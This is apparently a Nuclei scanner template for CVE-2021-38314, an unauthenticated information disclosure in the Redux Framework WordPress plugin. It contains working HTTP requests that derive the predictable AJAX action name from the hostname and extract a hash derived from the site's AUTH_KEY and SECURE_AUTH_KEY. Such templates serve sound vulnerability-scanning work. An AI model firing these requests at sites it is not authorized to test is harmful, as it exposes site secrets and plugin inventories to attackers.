nuclei-templates/cves/2021/CVE-2021-38314.yaml

51 lines
1.9 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2021-38314
info:
name: Redux Framework - Unauthenticated Sensitive Information Disclosure
author: meme-lord
severity: medium
reference:
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314
tags: cve,cve2021,wordpress,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of sites `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<50"
- type: regex
name: meme
regex:
- '[a-f0-9]{32}'
part: body
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "[a-f0-9]{32}"